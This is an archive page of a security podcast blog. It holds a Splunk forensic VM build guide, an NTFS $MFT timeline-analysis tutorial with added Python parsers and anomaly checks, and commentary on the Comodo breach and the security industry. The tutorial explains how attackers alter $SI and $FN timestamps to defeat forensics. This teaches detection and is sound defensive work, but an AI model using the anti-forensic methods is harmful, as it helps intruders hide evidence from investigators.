March 2011 Archives

Our guests tonight took particular exception to our (OK, we're throwing Larry under the bus here) Larry calling shenanigans until he saw code to accompany the Android app that brute-forces HIDs, so Michael Gough and Ian Robertson come on the show to explain their RFID research.

NOTE: The video will play the most recent show up until we are live!

Also joining us will be Deral Heiland to update us on his recent ShmooCon presentation "From Printer to PWND".

shenanigans.jpg
That's right folks.

Each episode comes complete with show notes, detailing the interviews, tech segments, and stories presented. Please visit our Episode 237 Show Notes Page on the Wiki for more info on the podcast.

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or tune into PaulDotCom Radio for an audio only version of the show.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

Cooking with Splunk

And now a guest post from Justin Hall!

Members of my incident investigation team are constantly on the move, traveling from customer to customer, gathering data, performing analysis, and writing reports. One of the tools we find ourselves commonly reaching for is a log analysis platform. Many of us are purists - “give me grep and coffee” types - while others enjoy a more organized “browsing” approach. We’ve found one solution that meets both of these needs - Splunk. (Note, I am not a paid spokesmodel for Splunk; we do not resell their product or make any money from them. We’re just big fans!)

I wanted to distribute a custom Splunk-based log analysis platform for our crew to use. I had a few key requirements in building this platform:

- It had to be portable. I wanted to build it and distribute it to our crew in a format that would be ready to use immediately, on any system in our fleet.
- It had to be powerful. I wanted it to meet as many of our log analysis needs as possible, in one package.
- It had to be secure. We need to make sure our customers’ data is protected while we’re investigating.
- It had to be free (as in beer). Our budget didn’t have room for crazy expensive tools.

So I went with a virtual machine that could be distributed and re-used easily. The recipe I ended up with included Oracle’s VirtualBox, a free virtual computing platform; Ubuntu Linux Server, my personal favorite flavor of Linux; and Splunk 4.2 for Linux.

Note, this article is not a “How to use Splunk” guide. If you are unfamiliar with Splunk, their documentation’s pretty good. I’ve found that just playing around with the tool is also a great learning experience!

Here’s how I built the platform.

1. Install VirtualBox, if it’s not already installed. As of this writing, v4.0.4 is the stable release.

2. Configure host-only networking to use a private subnet between your PC and the virtual machines. We use host-only networking to transfer data between the VM and the host OS so that it cannot be intercepted outside of our machine. This feature is usually enabled by default, but you should verify the subnet you’re using and the IP you have set on your host OS’s interface.
HostOSInterface.png

3. Create a new VM. I use two NICs on the VM: the first interface is bridged to the LAN and is only up when I am patching; the second interface is on the host-only network and receives an address on that network from VirtualBox’s built-in DHCP server. Make sure to give your VM sufficient RAM (I use at least 1GB) and enough disk space for the largest log set you can imagine storing on the VM’s filesystem. I usually max it out at around 30GB.
30GB.png

4. Install Linux. During the installation, we enabled full-disk encryption, not just because you might store log data on the VM’s filesystem, but because Splunk will index the logs and those indexes may also contain sensitive data. I use a dummy key initially; when I distribute the VM, our investigators add their own decryption key and remove the dummy key, so that it’s unique to each user’s VM.
UsersVM.png

5. You’ll also want to install the SSH server, so that you can securely transfer logs to the VM over a network connection.
NetworkConnection.png

6. I have two users on the machine: a standard user for normal operation, administration, and manual log analysis; and a Splunk service user. I call my first one ninja, but you can use whatever less awesome name you like. Then I add a Splunk user (called splunk) and give that user a home directory of /opt/splunk.

7. Once your OS is installed, configure the SSH server to disable root login, and if you don’t want to use passwords every time you copy a file to the VM, add your public SSH key to ~/.ssh/authorized_keys (although you may not want to do so before distributing!).
BeforeDist.png

8. What’s the first thing you do after installing an OS? Patch! I bring up my bridged adapter and run sudo apt-get update; sudo apt-get upgrade once a week or so. Remember to shut eth0 down afterwards.

9. Install Splunk on the VM. I’ve found the easiest method is to download the .deb package from Splunk, SCP it to the VM and run dpkg -i. It will install by default in the splunk user’s home directory, /opt/splunk.

10. Add your ninja and splunk users to a group for log access (I call mine “logs”). We will restrict the logs directory so only users in that group can write to it.

11. You can get your logs onto the system in many ways: copy from mounted removable media, download from a webserver, direct syslog, etc. Personally I like to SCP them to a logs directory on the filesystem, like /logs. Give the logs group +rw permissions to this directory. This is important, because Splunk will need to read the logs from this directory, and we’re going to run Splunk as the splunk user. I use the ninja user to SCP logs to this directory, from my host OS, over the host-only network. You can remove all other read/write permissions on the directory.

12. Fire up Splunk! Su to your splunk user, make sure that user has +rw on the /opt/splunk/ directory tree, and run /opt/splunk/bin/splunk start. You’ll have to accept a EULA.

13. Open your browser on your host OS and hit the web interface (http://vm-host-only-address:8000) on the host-only network. Log in with the default credentials, which are listed on the login page.
LoginPage.png

14. Switch to the Free license: go to Manage -> Licenses -> Change license group. The Free license has some features disabled (but probably nothing you’ll miss with this setup) and can only index 1GB of logs per day. If you go over once, Splunk will nag you; if you go over 3 times in a rolling 30-day period, Splunk disables your search capability until you upgrade to a paid license. So be careful!
BeCareful.png

15. Configure Splunk to monitor the /logs directory, so that Splunk reads log data as soon as it’s written to /logs. In Splunk, go to Manager -> Data Inputs and open Files and Directories. Add a new file input and point it to the /logs directory on the filesystem. You can leave all the other options at the defaults. You may also want to disable the other inputs listed under Files and Directories: the defaults are just Splunk’s own logfiles, but you might not want that data inadvertently showing up alongside your customer’s logs.
CustomersLogs.png

16. Test your setup: SCP a logfile to /logs and make sure it gets eaten by Splunk and is searchable. Watch Splunk’s main search page until events start showing up (the Events Indexed counter will increase), then run a search to verify the data is being processed properly.

17. You might want Splunk to start when you boot your VM. If so, enable Splunk boot-start with the splunk user: as root, run /opt/splunk/bin/splunk enable boot-start --user splunk

18. That’s it! You’re ready to analyze. Note, when you are done with an investigation, switch to the splunk user and run /opt/splunk/bin/splunk clean eventdata to remove all of the indexed data and prepare a blank slate for future investigations.

We’ve found this platform extremely convenient for log analysis work. When we want to do full-scale analysis, we have Splunk; when we want to quickly grep | cut | sort | uniq, we have the command line. I handed the VM files (the VBOX config file and the .VDI virtual disk it uses) to my investigation team, had them change the appropriate passwords, and they were ready to go.

We hope you find this recipe useful as well. Happy hunting!

Quick shameless plug: I am mentoring a session of SANS’ SEC504 - Hacker Techniques, Exploits & Incident Handling in Cincinnati, Ohio, starting May 11. You can find more information about the class, dates & times, and sign up here. Hope to see you there!
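Steps 7, 10 and 11 above are the ones most likely to be left half-done when the VM image is cloned and handed out: the /logs directory ends up world-readable, root login stays enabled, or a personal key is baked into authorized_keys. The script below is an added example (not Justin's code, not part of Splunk) that audits those three settings before an image is distributed. It assumes the paths from the post (/logs, the sshd_config file, the ninja user's ~/.ssh/authorized_keys) and the group name "logs"; run_demo() builds constructed fixtures in a temporary directory so it can be run anywhere, while on the VM itself you would call the check functions against the real paths.

```python
import grp
import os
import stat
import tempfile


def check_logs_dir(path, group_name=None):
    """Check the shared log drop directory (/logs in the post).

    Expected: the logs group can read and write, and users outside the
    owner and group have no access at all. Returns a list of findings;
    an empty list means the directory passes.
    """
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    findings = []
    if not stat.S_ISDIR(st.st_mode):
        findings.append("%s is not a directory" % path)
    if not (mode & stat.S_IRGRP and mode & stat.S_IWGRP):
        findings.append("group is missing read/write (mode %o)" % mode)
    if mode & stat.S_IRWXO:
        findings.append("other users have access (mode %o)" % mode)
    if group_name is not None and grp.getgrgid(st.st_gid).gr_name != group_name:
        findings.append("owning group is not %s" % group_name)
    return findings


def audit_sshd_config(lines):
    """Check sshd_config content for PermitRootLogin no.

    sshd honours the first occurrence of a keyword, so a later
    'PermitRootLogin no' does not override an earlier 'yes'.
    """
    settings = {}
    for raw in lines:
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) == 2:
            settings.setdefault(parts[0].lower(), parts[1].strip())
    findings = []
    value = settings.get("permitrootlogin")
    if value is None or value.lower() != "no":
        findings.append("PermitRootLogin is not set to no (first value seen: %s)" % value)
    return findings


def check_authorized_keys(path):
    """Before handing the VM image out, no personal keys should be baked in."""
    if not os.path.exists(path):
        return []
    with open(path) as f:
        keys = [line for line in f if line.strip() and not line.startswith("#")]
    if keys:
        return ["%d key(s) present in %s; remove them before distributing" % (len(keys), path)]
    return []


def run_demo():
    """Build constructed fixtures in a temporary directory and audit them."""
    base = tempfile.mkdtemp()
    good_logs = os.path.join(base, "logs")
    os.mkdir(good_logs)
    os.chmod(good_logs, 0o770)          # owner and logs group only
    weak_logs = os.path.join(base, "logs_weak")
    os.mkdir(weak_logs)
    os.chmod(weak_logs, 0o777)          # world-writable: the mistake to catch

    sshd_ok = ["# constructed sshd_config", "Port 22", "PermitRootLogin no"]
    sshd_bad = ["PermitRootLogin yes", "PermitRootLogin no  # ignored, first occurrence wins"]

    keys_path = os.path.join(base, "authorized_keys")
    with open(keys_path, "w") as f:
        f.write("ssh-rsa AAAA-constructed-placeholder ninja@host\n")   # not a real key

    return {
        "good_logs_dir": check_logs_dir(good_logs),
        "weak_logs_dir": check_logs_dir(weak_logs),
        "sshd_ok": audit_sshd_config(sshd_ok),
        "sshd_bad": audit_sshd_config(sshd_bad),
        "authorized_keys": check_authorized_keys(keys_path),
    }


if __name__ == "__main__":
    for check, findings in run_demo().items():
        print("%-16s %s" % (check, findings or "OK"))
```

On the finished VM the equivalent calls are check_logs_dir("/logs", group_name="logs"), audit_sshd_config(open("/etc/ssh/sshd_config")) and check_authorized_keys("/home/ninja/.ssh/authorized_keys"); the first-occurrence rule in audit_sshd_config matters because a hardening line appended to the end of sshd_config silently loses to an earlier default.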

Comodo and Feeding Trolls

Short post today. I am currently in the middle of teaching SANS 504 in Orlando and I am quite stoked to learn that @CoryKennedy will be joining the class today. If you have not already, you should check out his blog here. However, I did want to mention the Comodo attack briefly. It turns out the attacker is modeling his hacking career after Charlie Sheen. Please see below:
PastedGraphic-1.tiff
Now, I know I am breaking a key rule of the Internet because I am feeding an obvious troll. But, dang... if that ain't funny.
2troll.jpg
However, this is another attack that highlights just how bad things can get if an attacker gets a single SSL provider. In this attack it looks as though he compromised GlobalTrust.it and InstantSSL.it who were partners of Comodo. From there he was able to forge certificates for Skype, Yahoo, Google and Mozilla. You should go back and read that last line again... I'll wait. What does this mean to the industry as a whole? Well, it is once again showing there can be weaknesses in every security layer we implement. Once again, we need to look at our security architecture and look for any components where failure can lead to total failure of the architecture. As for trolls, don’t feed them...Unless it’s fun.

Fully packed show! Chris Nickerson and Eric Smith come on to talk about PTES, the new standard for executing penetration tests. Kevin Fiscus does an interview about risk management, helping customers, and more! Bugbear does a technical segment that will make you think twice about timestomping (NTFS MFT FTW), and the crew talks stories, including RSA, Comodo, and more!

PTES - Penetration Testing Execution Standard

NTFS MFT Timelines and Malware Analysis

Security News - "Drunken Style" - PaulDotCom Episode 236

Episode 236 Show Notes

Episode 236 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, John Strand, Larry Pesce

Audio Feeds:

We get a special guest technical blog post straight from Tim Mugherini.

NTFS: “New Technologies File System”

NTFS is the default file system of all modern versions of Windows; version 3.1 is the current version on Windows XP and above. The Master File Table ($MFT) is the heart of the NTFS file system and contains the metadata about all the files and directories on the file system. Each file and directory has at least one entry in the $MFT.

By default, each MFT entry is 1024 bytes in size (the size is defined in the boot sector). The first 42 bytes of an entry contain 12 defined header fields, and the remaining unstructured space is used by attributes. It is these attributes that are useful during analysis, but only if we understand the effects of the operating system, software, and user behavior on their values.

There are some limitations. The MFT will expand as needed, and NTFS does NOT delete MFT entries after they have been created; instead, an entry is re-allocated for use once its file has been deleted. Upon file deletion, the entry’s “in-use” flag is set to 0x00 and the entry becomes available. Entries are reused in sequential order, and once an entry is re-allocated its attribute data is overwritten.

Loving the Hex: Overview of NTFS Master File Table Attributes


MFTBreakdownChart.png

The $STANDARD_INFORMATION ($SI) attribute has a type identifier of 16. It holds four 64-bit MACE (Modified, Accessed, Created, Entry modified) timestamps, each stored as the number of 100-nanosecond intervals since January 1, 1601 UTC. Many of the values stored in the $SI attribute are what explorer.exe displays when viewing the properties of a file or folder.


FileProperties.png

The $FILE_NAME ($FN) attribute has a type identifier of 48 and contains the file name (encoded in UTF-16 Unicode), a reference to the parent directory, and a second set of MACE timestamps. Rob T. Lee has done a fair amount of work cataloging how the $SI and $FN time attributes change in response to different file operations. Since the behavior of the $MFT time attributes is known, we can use them to help identify malicious files.

The Sleuth Kit: FTW

The Sleuth Kit (TSK) is a collection of forensic command line tools for *nix and Windows that can analyze most common file systems.
Let’s search a dd (raw) image for a suspected malicious file called malicious.dll with the TSK tool “fls”.

# fls -f ntfs -r Image001.dd | grep malicious.dll
++ r/r 1618-128-1:	malicious.dll

This returns the $MFT record number, which is 1618. Using “icat” we can now carve the $MFT entry out: entry 0 is the $MFT itself, and each entry is 1024 bytes, so dd can skip straight to record 1618.


# icat -f ntfs Image001.dd 0 | dd bs=1024 skip=1618 count=1 | xxd

I have shortened the output to display just the entry header and marked up some attributes of interest.

MFTHeaderBreakdown_highlighted.png


Now we can view specific attributes for this entry by specifying the type. For example, to view $SI (type=16) for entry 1618 (the first attribute starts at offset 56, as defined by bytes 20-21 of the header above):

# icat -f ntfs Image001.dd 1618-16 | xxd


Type16.png

The first thirty-two bytes represent the creation, modified, entry, and accessed times (8 bytes each). Note that three of these timestamps appear to be the same (February 11, 2010 7:30 AM). The entry date is different, however (March 2, 2011 7:15 AM). This is the date the $MFT entry was created and is usually the same as the creation (born) date (an exception would be a soft delete of a file). Bytes 32-35 represent the attribute flags outlined earlier (i.e. read only, archived, etc.).
Similarly, to view $FN (type=48) for entry 1618:


# icat -f ntfs Image001.dd 1618-48 | xxd


1618.png

Bytes 0-7 of the $FN attribute are the parent directory reference (in this case the system32 folder). The next 32 bytes are the four $FN time values, which match the $SI entry date. The last 28 bytes in the above example represent the file name.

Stop: A Quick Side Note on File Deletion

If a file is recycled, then the file name will change to $.ext and its location will be in the .\Recycle.Bin\ folder. The $MFT record will still be marked active until the recycle bin is emptied, and the $SI Entry Date will represent the date the file was moved to the recycle bin, even after it is removed from the Recycle Bin.
If a hard delete of the file occurred, then the $MFT record is immediately marked inactive, and the file name and all time attributes remain unchanged (until overwritten by a new entry).

Practical Use: Exporting and Parsing the $MFT

While using TSK to view a $MFT entry for a specific file is useful, it might be more useful to parse all entries into a friendlier format for further analysis. If you have identified a malicious file, doing so could help identify all other files and folders associated with the time of compromise.
First we must carve the entire $MFT out of a volume or image with “icat” (entry 0 is the $MFT itself):


sudo icat Image001.dd 0 > MFT

Once we have the $MFT, we can use David Kovar’s analyzeMFT.py to parse every record into CSV format:


analyzeMFT.py -f MFT -o MFTOut.csv -a

The following is an example of rogue AV (ISe6d_2229.exe) I discovered on a user’s Windows 7 laptop. By parsing the $MFT I was able to discover the other file locations associated with the time of infection. The following output was sorted by the $FN Entry Time (note: times are in UTC by default).

RogueAVMFTOut.png


In this case I used this information to identify the prefetch file associated with the infection and used prefetch parser to parse the contents and obtain the location of the payload for dynamic analysis.

Prefetch.png

Anti-Forensics: Manipulating the $MFT Times

It is possible to manipulate the $SI timestamps. Vinnie Liu demonstrated this with the Metasploit Timestomp project in 2005. The following is an example of doing the same with Windows PowerShell.

PowershellSIManip.png

Let’s use the TSK “istat” tool to display the metadata of our malicious file in a visually friendlier way.

# istat -f ntfs ntfs1.dd 1618
Istat_out.png

If the $SI Entry Modified date mirrors the creation date, then output like the above might indicate timestamp tampering (an exception would be file deletion). Additionally, the $FN attributes initially mirror the $SI creation date. They can change, and while it is more difficult to manipulate the $FN attributes, it is not impossible.
Changing the system time prior to file creation would certainly get you there, but there would still be indicators of the initial compromise, so changing the time attributes after file creation would be ideal for an attacker. Changing the system time, altering the $SI attributes, and then leveraging some of the behavioral effects on the $FN time attributes (i.e. moving and renaming the files) would change all of the time attributes.
This could still be detectable, however. Newer versions of analyzeMFT.py (v1.5 and above) not only look for differences between the $SI and $FN time attributes but also look for usec (microsecond) abnormalities.


• -a (anomaly detection) adds two columns:
• std-fn-shift: Y = $FN create time is after the $SI create time
• Usec-zero: Y = $SI create time has usec = 0

The following examples demonstrate both abnormalities.

AnalyzeMFT_usec.png
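The $SI and $FN layouts walked through above with xxd, and the two analyzeMFT.py -a checks just listed, fit in a short parser. The following is an added example, not code from the post and not analyzeMFT.py itself: it unpacks the leading fields of a $STANDARD_INFORMATION body (four FILETIMEs plus the flag field) and a $FILE_NAME body (parent reference, four FILETIMEs, sizes, flags, name length, namespace, UTF-16LE name), converts the 100-nanosecond counts since 1601 to UTC datetimes, and flags std-fn-shift and usec-zero. The sample bytes are constructed: the epochs 1265891400 (2010-02-11 12:30:00 UTC) and 1299068121 (2011-03-02 12:15:21 UTC) are taken from the mft_parser_cl.exe bodyfile lines later in the post, while the parent record number and sequence are hypothetical placeholders.

```python
import struct
from datetime import datetime, timedelta, timezone

# Seconds between the FILETIME epoch (1601-01-01 UTC) and the Unix epoch (1970-01-01 UTC).
EPOCH_DIFF_SECONDS = 11644473600
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
SI_FORMAT = "<QQQQI"          # created, modified, $MFT entry modified, accessed, DOS flags
FN_FORMAT = "<QQQQQQQIIBB"    # parent ref, 4 times, alloc size, real size, flags, reparse, name len, namespace
FN_HEADER_LEN = struct.calcsize(FN_FORMAT)   # 66 bytes; the UTF-16LE name follows


def filetime_to_datetime(ft):
    """Convert a 64-bit count of 100 ns intervals since 1601-01-01 UTC to an aware UTC datetime.

    datetime only resolves microseconds, so the last decimal digit of the tick count is dropped.
    """
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def unix_to_filetime(epoch_seconds, ticks=0):
    """Build a FILETIME from Unix seconds plus an optional sub-second count of 100 ns ticks."""
    return (epoch_seconds + EPOCH_DIFF_SECONDS) * 10_000_000 + ticks


def parse_standard_information(data):
    """Parse the leading fields of a $STANDARD_INFORMATION (type 16) attribute body."""
    created, modified, mft_modified, accessed, flags = struct.unpack_from(SI_FORMAT, data, 0)
    return {
        "created": filetime_to_datetime(created),
        "modified": filetime_to_datetime(modified),
        "mft_modified": filetime_to_datetime(mft_modified),   # the "entry" date in the post
        "accessed": filetime_to_datetime(accessed),
        "flags": flags,
    }


def parse_file_name(data):
    """Parse a $FILE_NAME (type 48) attribute body: parent reference, times, then the name."""
    (parent_ref, created, modified, mft_modified, accessed, _alloc, _real,
     flags, _reparse, name_len, namespace) = struct.unpack_from(FN_FORMAT, data, 0)
    name = data[FN_HEADER_LEN:FN_HEADER_LEN + 2 * name_len].decode("utf-16-le")
    return {
        "parent_record": parent_ref & 0xFFFFFFFFFFFF,   # low 48 bits: parent $MFT record number
        "parent_sequence": parent_ref >> 48,            # high 16 bits: sequence number
        "created": filetime_to_datetime(created),
        "modified": filetime_to_datetime(modified),
        "mft_modified": filetime_to_datetime(mft_modified),
        "accessed": filetime_to_datetime(accessed),
        "flags": flags,
        "namespace": namespace,                         # 0 POSIX, 1 Win32, 2 DOS, 3 Win32&DOS
        "name": name,
    }


def build_si(created, modified, mft_modified, accessed, flags=0):
    """Pack an $SI body from FILETIME integers (used here to construct sample input)."""
    return struct.pack(SI_FORMAT, created, modified, mft_modified, accessed, flags)


def build_fn(parent_ref, created, modified, mft_modified, accessed, name, flags=0, namespace=1):
    """Pack a $FN body from FILETIME integers and a file name (sample-input helper)."""
    header = struct.pack(FN_FORMAT, parent_ref, created, modified, mft_modified, accessed,
                         0, 0, flags, 0, len(name), namespace)
    return header + name.encode("utf-16-le")


def detect_timestamp_anomalies(si, fn):
    """The two checks analyzeMFT.py -a reports, as described in the post."""
    return {
        # std-fn-shift: $FN create time is after the $SI create time
        "std_fn_shift": fn["created"] > si["created"],
        # usec-zero: $SI create time has a zero sub-second component
        "usec_zero": si["created"].microsecond == 0,
    }


# Constructed sample matching the post's malicious.dll walkthrough. Epoch values come from the
# mft_parser_cl.exe bodyfile lines later in the post; the parent reference is a placeholder.
FILE_ATTRIBUTE_ARCHIVE = 0x20
T_FEB_2010 = unix_to_filetime(1265891400)                    # whole second: usec is zero
T_MAR_2011 = unix_to_filetime(1299068121, ticks=4_731_250)   # 0.473125 s past the second
PARENT_REF = (5 << 48) | 0xBEEF                              # hypothetical system32 record, seq 5

SAMPLE_SI = build_si(T_FEB_2010, T_FEB_2010, T_MAR_2011, T_FEB_2010, FILE_ATTRIBUTE_ARCHIVE)
SAMPLE_FN = build_fn(PARENT_REF, T_MAR_2011, T_MAR_2011, T_MAR_2011, T_MAR_2011,
                     "malicious.dll", FILE_ATTRIBUTE_ARCHIVE)


def analyze_sample():
    """Parse both sample attributes and run the anomaly checks."""
    si = parse_standard_information(SAMPLE_SI)
    fn = parse_file_name(SAMPLE_FN)
    return si, fn, detect_timestamp_anomalies(si, fn)


if __name__ == "__main__":
    si, fn, anomalies = analyze_sample()
    for label, ts in (("$SI", si), ("$FN", fn)):
        for key in ("created", "modified", "mft_modified", "accessed"):
            print("%s %-13s %s" % (label, key, ts[key].isoformat()))
    print("name=%s parent=%d anomalies=%s" % (fn["name"], fn["parent_record"], anomalies))
```

To run the parsers against a real entry, feed parse_standard_information and parse_file_name the raw bytes that the icat ... 1618-16 and icat ... 1618-48 commands above emit (without piping through xxd). The usec-zero check is only a heuristic: a file copied by a tool that truncates to whole seconds will also trip it, which is why the post pairs it with the $SI/$FN comparison.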

Coming to a Lab Near You: Super Timelines

$MFT $FN Attributes + Super Timelines = WIN

Utilities such as Log2Timeline and The Sleuth Kit’s mactime allow for the creation of a Super Timeline by leveraging the bodyfile format. Multiple timeline sources (i.e. event logs, registry, prefetch, etc.) can be combined for a complete forensic picture of an incident or compromise.

To date, however, this has not been possible with both the $SI and $FN attributes from the $MFT. Mark McKinnon was kind enough to let me check out his MFT_Parser utility, which does support this functionality. The full file path for each $MFT entry is listed, as are both the $SI and $FN time attributes. This is very useful for detecting stomping while looking at a super timeline. Dave Hull has a great post on the subject here.

Mark has released this utility for Windows as a beta for PDC listeners (*nix and Mac support is also on its way). The Windows version can be found here.

The syntax for the cli is as follows:


mft_parser_cl.exe <$MFT File>

For example, mft_parser_cl.exe $MFT pdc001 MFTOut C would output everything on the volume in the following bodyfile format: one line carries the $SI times for an entry, and a second line, with the path prefixed C:FN, carries the $FN times.

|C:/Windows/System32/malicious.dll|1618|-/-rwxrwxrwx|0|0|0|1299068121|1265891400|1265891400|1265891400
|C:FN/Windows/System32/malicious.dll|1618|-/-rwxrwxrwx|0|0|0|1299068105|1299068105|1299068105|1299068105
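The bodyfile lines above are the glue between MFT_Parser and a super timeline, so it is worth seeing what mactime does with them. The following is an added example, not Mark McKinnon's tool and not mactime: it parses bodyfile text (the TSK 3.x field order md5|name|inode|mode|uid|gid|size|atime|mtime|ctime|crtime), treats a C:FN path prefix as the $FN copy of an entry, expands each record into one event per distinct timestamp with a mactime-style "macb" string, and merges any number of sources into a sorted timeline. The two $MFT lines are the ones shown in the post; the prefetch line is a constructed stand-in for a second source such as log2timeline output, with a hypothetical file name and times.

```python
from datetime import datetime, timezone

# TSK 3.x bodyfile field order, the input format mactime consumes.
BODYFILE_FIELDS = ("md5", "name", "inode", "mode", "uid", "gid", "size",
                   "atime", "mtime", "ctime", "crtime")
# mactime prints one letter per timestamp type, in this order: m a c b.
MACB_ORDER = (("mtime", "m"), ("atime", "a"), ("ctime", "c"), ("crtime", "b"))
FN_PREFIX = "C:FN"   # how mft_parser_cl.exe marks the $FILE_NAME copy of an entry (from the post's output)


def parse_bodyfile(text, default_source="$SI"):
    """Parse bodyfile text into record dicts, tagging each with its timeline source."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split("|")
        if len(parts) != len(BODYFILE_FIELDS):
            raise ValueError("expected %d fields, got %d: %r" % (len(BODYFILE_FIELDS), len(parts), line))
        rec = dict(zip(BODYFILE_FIELDS, parts))
        for key in ("atime", "mtime", "ctime", "crtime"):
            rec[key] = int(rec[key])
        if rec["name"].startswith(FN_PREFIX):
            rec["source"] = "$FN"
            rec["name"] = "C:" + rec["name"][len(FN_PREFIX):]   # normalize so $SI and $FN lines pair up by path
        else:
            rec["source"] = default_source
        records.append(rec)
    return records


def timeline_events(records):
    """Expand each record into mactime-style events: one per distinct timestamp, with a macb string."""
    events = []
    for rec in records:
        letters_at = {}
        for key, letter in MACB_ORDER:
            letters_at.setdefault(rec[key], set()).add(letter)
        for epoch, letters in letters_at.items():
            events.append({
                "time": datetime.fromtimestamp(epoch, tz=timezone.utc),
                "macb": "".join(l if l in letters else "." for _, l in MACB_ORDER),
                "source": rec["source"],
                "inode": rec["inode"],
                "name": rec["name"],
            })
    return events


def build_super_timeline(*record_lists):
    """Merge events from any number of parsed bodyfiles into one chronologically sorted list."""
    events = [e for records in record_lists for e in timeline_events(records)]
    events.sort(key=lambda e: (e["time"], e["name"], e["source"]))
    return events


def format_timeline(events):
    """Render events as text lines, one per event."""
    return ["%s %s %-9s %6s %s" % (e["time"].isoformat(), e["macb"], e["source"], e["inode"], e["name"])
            for e in events]


# The two bodyfile lines from the mft_parser_cl.exe example above.
SAMPLE_MFT_BODYFILE = """\
|C:/Windows/System32/malicious.dll|1618|-/-rwxrwxrwx|0|0|0|1299068121|1265891400|1265891400|1265891400
|C:FN/Windows/System32/malicious.dll|1618|-/-rwxrwxrwx|0|0|0|1299068105|1299068105|1299068105|1299068105
"""
# Constructed second source (hypothetical prefetch file and times) standing in for log2timeline output.
SAMPLE_PREFETCH_BODYFILE = (
    "|C:/Windows/Prefetch/EXAMPLE.EXE-00000000.pf|0|-/-rwxrwxrwx|0|0|0"
    "|1299068200|1299068200|1299068200|1299068200\n"
)


def sample_timeline():
    """Build the merged timeline for the sample data."""
    mft = parse_bodyfile(SAMPLE_MFT_BODYFILE)
    prefetch = parse_bodyfile(SAMPLE_PREFETCH_BODYFILE, default_source="prefetch")
    return build_super_timeline(mft, prefetch)


if __name__ == "__main__":
    print("\n".join(format_timeline(sample_timeline())))
```

In the merged output the $SI born time of malicious.dll sits in February 2010 while its $FN row, tagged separately, is born in March 2011 a few seconds before the $SI entry-modified event; that is the pattern the post describes as visible stomping once $FN rows are in the timeline. Real bodyfiles from fls or log2timeline are passed to parse_bodyfile with a default_source naming where they came from.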

IR and Malware Analysis WIN!

Summary

This is one forensic technique (Timeline Analysis) that focuses on one object ($MFT) in one layer (Metadata) of one type of file system (NTFS) during one type of malware analysis (Static) that is typically done during one phase (Detection/Analysis) of incident response. It is something you can add to your Incident Response and Malware Analysis toolkit.

Table Stakes and EMO Security


I've been thinking a lot about this topic lately, so Rich's article is timely. Rich says that we are finally at the table, security is a legit "thing" now, and we should stop whining about FUD, products, sales people, and a host of other things.

First, we're not complaining, well some of us may be, but most of us are trying to keep this business away from FUD and stop people from using half-baked products. This is important to business, any business, not just security, and it’s important for all of us to understand business as it relates to security. I hear ya Rich, not all of us do, and we could benefit from a "Business 101 for Security Professionals Course." I have a degree in business, and it was nothing more than experience that taught me what I know, albeit I am still learning. The business landscape is constantly changing, and we have to roll with the punches as technology, and the security of the technology, constantly changes. Okay, enough rambling, let me address Rich's points, some of which are really spot on.

1) Hate the endless compliance cycle? For most of you it's the only reason executives listen to you at all. - Really? If the only reason stakeholders listen to me is because of PCI, I am doing it WRONG. Compliance is one phase of the game, don't forget about raw security and that thing called risk management. If you can't work with your management on all three fronts, you are playing a losing game (hopefully it's not global thermonuclear war).


wargames.jpg

By the way, if you see this during a pentest, it can be a bad sign..

Or a sign of the best Pentest Ever!!

2) Hate the "industry"? Name me one other area of society involving big money that doesn't become dominated by some sort of industry. - I think we're dominated by business, and if you don't understand the business, you shouldn't be complaining. That’s not to say we all can't work to make this industry have integrity.

3) Despondent over lack of innovation? Then stop buying the same crap you buy every year and invest in the products struggling to innovate - I could not agree more! We have crappy products because people buy them.

4) Tired of users who just don't get it? How about you stop pretending human behavior can change and that just because you see something a certain way you're any better than everyone else. BINGO! Don't give up on user education, but continue to use innovative technologies that protect the user and let them do their jobs.

5) Pissed at careless developers? Go write a secure piece of software on time, budget, and specifications, and come talk to me again. - Yes, writing secure software is hard. However, this is another area where you can use education, coupled with technology, to make resilient software. There are many efforts in this area, Rugged, Dan Kaminsky's project.

6) Shocked that the bad guys are targeting you personally? Why the f* wouldn't they try to remove or distract the guards? Do you want to be friends? - So true, I used to hear "No one would want to hack us." Get over it, people want to hack you. They are many. They have all different motives. They come in all shapes, flavors, and sizes. Defense is hard, be creative.

7) Angry at vendors that lie about capabilities? Then stop forcing them to have dozens of widgets and performance capabilities you won't ever use or send back for a refund. - Whoa, how is it my fault that vendors lie about capabilities? It’s true, technology gets complicated because everyone wants something custom for their needs.

Dear vendors, provide your customers a nice API, tell them to hire some talented people, and stop requesting one-off features. There's a start. Example, why do I need 8,000 features in my web browser or document publishing product? It’s a tough market, and features rule, but my bet is that you could sell modular and trimmed-down versions of software. The problem is human nature tells us that we want the "advanced" version of everything, not the basic, because heaven forbid we don't have a feature, like Mr. Clippy.

Finally, we think this is fun. Sure, we discussed a story where one individual said he was ready to quit on the last show, and that is sad. But we should also all understand that we are at a point where IT is learning the limitations of their security services and products. Many of us in the security industry have known this for quite some time. But it is nice that other members of management, and IT are starting to see it as well.

The point is this is a dynamic and fun field. Also, many of us know what and where security's limitations exist. This is a good thing. Now, we just need to do something about them.

In short, we agree with Rich. We need to stop complaining and start spending more time fixing problems.

345px-Emo_hitler.jpg
Emo is lame
Hitler is lame
Neither belong in Information Security

-Paul Asadoorian and John Strand

Originally discussed during episode 234

John Strand will be teaching SANS 660 Advanced Network Penetration Testing and Metasploit for Penetration testers This April in Reston, VA April 15 - 23.

Eric Smith, Chris Nickerson, Kevin Fiscus & Bugbear all come on the show tonight! Alphabet soup includes PTES, NTFS MFT Timelines, and NWN Stars. We've got about two episodes' worth of material in one night - come and join the show live!

You can view live at 7:30PM EDT right here:

NOTE: The video will play the most recent show up until we are live!

Bugbears_toolkit.jpg
BugBear asks: What's in your Incident Response Toolkit?

